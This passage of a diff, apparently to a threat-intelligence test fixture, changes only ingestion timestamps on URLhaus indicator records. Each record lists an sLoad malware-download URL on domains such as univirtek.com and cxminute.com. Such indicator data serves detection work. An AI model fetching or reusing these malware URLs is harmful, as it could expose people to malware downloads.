listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3956,7 +3956,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692775058Z", + "ingested": "2021-12-13T08:40:08.025053300Z", "original": "{\"id\":\"961464\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961464/\",\"url\":\"https://ladiesincode.com/ladi/10582470158/uk.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:50:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -4002,7 +4002,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692778465Z", + "ingested": "2021-12-13T08:40:08.025060200Z", "original": "{\"id\":\"961465\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961465/\",\"url\":\"https://ladiesincode.com/ladi/BTTLNZ68A56D325C/map.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:50:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4048,7 +4048,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692781821Z", + "ingested": "2021-12-13T08:40:08.025067Z", "original": "{\"id\":\"961466\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961466/\",\"url\":\"https://letonguesc.com/leto/NNTLRT68P28A717L/en.jpg\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:50:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4094,7 +4094,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692785317Z", + "ingested": "2021-12-13T08:40:08.025074Z", "original": "{\"id\":\"961461\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961461/\",\"url\":\"https://univirtek.com/viro/CTTNDR89A19B149W/maps.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -4140,7 +4140,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692788604Z", + "ingested": "2021-12-13T08:40:08.025080900Z", "original": "{\"id\":\"961462\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961462/\",\"url\":\"https://cxminute.com/minu/DRSNTN77B16I197U/logo.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4186,7 +4186,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692791840Z", + "ingested": "2021-12-13T08:40:08.025087900Z", "original": "{\"id\":\"961463\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961463/\",\"url\":\"https://univirtek.com/viro/02941830735/uk.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4232,7 +4232,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692795076Z", + "ingested": "2021-12-13T08:40:08.025094700Z", "original": "{\"id\":\"961458\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961458/\",\"url\":\"https://belfetproduction.com/bella/MNSGCM91A04G240K/it.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -4278,7 +4278,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692798502Z", + "ingested": "2021-12-13T08:40:08.025101600Z", "original": "{\"id\":\"961459\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961459/\",\"url\":\"https://ladiesincode.com/ladi/03108100615/it.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4324,7 +4324,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692801869Z", + "ingested": "2021-12-13T08:40:08.025108400Z", "original": "{\"id\":\"961460\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961460/\",\"url\":\"https://cxminute.com/minu/PTACSM56A31F604X/en.png\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4370,7 +4370,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692805395Z", + "ingested": "2021-12-13T08:40:08.025115300Z", "original": "{\"id\":\"961455\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961455/\",\"url\":\"https://univirtek.com/viro/00183050368/en.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:39 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -4416,7 +4416,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692810865Z", + "ingested": "2021-12-13T08:40:08.025156600Z", "original": "{\"id\":\"961456\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961456/\",\"url\":\"https://cxminute.com/minu/TSNLSN58H30G912H/uk.gif\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:49:39 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4462,7 +4462,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692815133Z", + "ingested": "2021-12-13T08:40:08.025165600Z", "original": "{\"id\":\"961457\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961457/\",\"url\":\"https://letonguesc.com/leto/08658331007/blank.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:39 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4508,7 +4508,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692819632Z", + "ingested": "2021-12-13T08:40:08.025172700Z", "original": "{\"id\":\"961450\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961450/\",\"url\":\"https://cxminute.com/minu/01098910324/blank.png\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -4554,7 +4554,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692823279Z", + "ingested": "2021-12-13T08:40:08.025179500Z", "original": "{\"id\":\"961451\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961451/\",\"url\":\"https://univirtek.com/viro/02794390233/uk.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4600,7 +4600,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692826565Z", + "ingested": "2021-12-13T08:40:08.025186300Z", "original": "{\"id\":\"961452\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961452/\",\"url\":\"https://univirtek.com/viro/CSTDNT69D63F754D/en.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4646,7 +4646,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692830572Z", + "ingested": "2021-12-13T08:40:08.025195200Z", "original": "{\"id\":\"961453\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961453/\",\"url\":\"https://univirtek.com/viro/GSTGNE91B06L219W/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -4692,7 +4692,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692834299Z", + "ingested": "2021-12-13T08:40:08.025202300Z", "original": "{\"id\":\"961454\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961454/\",\"url\":\"https://univirtek.com/viro/03610140125/map.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4738,7 +4738,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692837455Z", + "ingested": "2021-12-13T08:40:08.025209200Z", "original": "{\"id\":\"961448\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961448/\",\"url\":\"https://belfetproduction.com/bella/CRRLRD74E09A462T/blank.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:49:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4784,7 +4784,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692840461Z", + "ingested": "2021-12-13T08:40:08.025216100Z", "original": "{\"id\":\"961449\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961449/\",\"url\":\"https://univirtek.com/viro/RSTFRZ57T05G337C/maps.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -4830,7 +4830,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692843727Z", + "ingested": "2021-12-13T08:40:08.025223Z", "original": "{\"id\":\"961447\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961447/\",\"url\":\"https://letonguesc.com/leto/LBRFNC56S10D952D/map.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4876,7 +4876,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692847043Z", + "ingested": "2021-12-13T08:40:08.025229900Z", "original": "{\"id\":\"961444\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961444/\",\"url\":\"https://univirtek.com/viro/01669890194/it.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4922,7 +4922,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692850680Z", + "ingested": "2021-12-13T08:40:08.025236800Z", "original": "{\"id\":\"961445\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961445/\",\"url\":\"https://letonguesc.com/leto/GTNNTN60P12H632S/maps.css\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -4968,7 +4968,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692853966Z", + "ingested": "2021-12-13T08:40:08.025243600Z", "original": "{\"id\":\"961446\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961446/\",\"url\":\"https://cxminute.com/minu/ZHOXBN72B06Z210N/en.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5014,7 +5014,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692857333Z", + "ingested": "2021-12-13T08:40:08.025250500Z", "original": "{\"id\":\"961442\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961442/\",\"url\":\"https://letonguesc.com/leto/KHNGGR61S21Z112Y/uk.css\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5060,7 +5060,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692860529Z", + "ingested": "2021-12-13T08:40:08.025257300Z", "original": "{\"id\":\"961443\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961443/\",\"url\":\"https://ladiesincode.com/ladi/MNRMNL75A12I531F/uk.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -5106,7 +5106,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692863715Z", + "ingested": "2021-12-13T08:40:08.025264200Z", "original": "{\"id\":\"961438\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961438/\",\"url\":\"https://ladiesincode.com/ladi/RBGMNL67A02L675L/uk.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5152,7 +5152,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692866931Z", + "ingested": "2021-12-13T08:40:08.025271100Z", "original": "{\"id\":\"961439\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961439/\",\"url\":\"https://letonguesc.com/leto/RSSPPL67P15G535L/map.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5198,7 +5198,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692870387Z", + "ingested": "2021-12-13T08:40:08.025278100Z", "original": "{\"id\":\"961440\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961440/\",\"url\":\"https://fhivelifestyle.online/nhbrwvdffsgt/adf/uk.css\",\"url_status\":\"offline\",\"host\":\"fhivelifestyle.online\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -5244,7 +5244,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692873844Z", + "ingested": "2021-12-13T08:40:08.025285200Z", "original": "{\"id\":\"961441\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961441/\",\"url\":\"https://letonguesc.com/leto/BNTLGU67R11L706R/blank.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5290,7 +5290,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692877130Z", + "ingested": "2021-12-13T08:40:08.025292200Z", "original": "{\"id\":\"961437\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961437/\",\"url\":\"https://cxminute.com/minu/03713610651/map.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5336,7 +5336,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692880366Z", + "ingested": "2021-12-13T08:40:08.025299Z", "original": "{\"id\":\"961436\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961436/\",\"url\":\"https://univirtek.com/viro/01312580507/uk.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -5382,7 +5382,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692883943Z", + "ingested": "2021-12-13T08:40:08.025306Z", "original": "{\"id\":\"961431\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961431/\",\"url\":\"https://cxminute.com/minu/FRNRST34B11F843P/blank.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5428,7 +5428,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692887209Z", + "ingested": "2021-12-13T08:40:08.025312800Z", "original": "{\"id\":\"961432\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961432/\",\"url\":\"https://univirtek.com/viro/RCUNDA90D24Z100H/1x1.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5474,7 +5474,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692890986Z", + "ingested": "2021-12-13T08:40:08.025319700Z", "original": "{\"id\":\"961433\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961433/\",\"url\":\"https://univirtek.com/viro/GTTGRI72H19A952D/map.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -5520,7 +5520,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692894352Z", + "ingested": "2021-12-13T08:40:08.025326500Z", "original": "{\"id\":\"961434\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961434/\",\"url\":\"https://univirtek.com/viro/00385010103/map.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5566,7 +5566,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692897528Z", + "ingested": "2021-12-13T08:40:08.025333400Z", "original": "{\"id\":\"961435\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961435/\",\"url\":\"https://ladiesincode.com/ladi/04263990162/map.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5612,7 +5612,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692900634Z", + "ingested": "2021-12-13T08:40:08.025340300Z", "original": "{\"id\":\"961428\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961428/\",\"url\":\"https://univirtek.com/viro/BNNSFN74A13G674O/logo.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -5658,7 +5658,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692904161Z", + "ingested": "2021-12-13T08:40:08.025347200Z", "original": "{\"id\":\"961429\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961429/\",\"url\":\"https://univirtek.com/viro/RZZCRS93B15G224O/it.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5704,7 +5704,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692907407Z", + "ingested": "2021-12-13T08:40:08.025354100Z", "original": "{\"id\":\"961430\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961430/\",\"url\":\"https://cxminute.com/minu/01495100032/maps.gif\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5750,7 +5750,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692910833Z", + "ingested": "2021-12-13T08:40:08.025361Z", "original": "{\"id\":\"961427\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961427/\",\"url\":\"https://letonguesc.com/leto/CMPDVD69C11G693Z/map.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:48:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -5796,7 +5796,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692914400Z", + "ingested": "2021-12-13T08:40:08.025367800Z", "original": "{\"id\":\"961426\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961426/\",\"url\":\"https://cxminute.com/minu/LLLMRC84B29A944R/it.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5842,7 +5842,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692917616Z", + "ingested": "2021-12-13T08:40:08.025374700Z", "original": "{\"id\":\"961421\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961421/\",\"url\":\"https://cxminute.com/minu/PRSSFN72L18C573S/map.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5888,7 +5888,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692920712Z", + "ingested": "2021-12-13T08:40:08.025381600Z", "original": "{\"id\":\"961422\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961422/\",\"url\":\"https://ladiesincode.com/ladi/00814870150/1x1.png\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
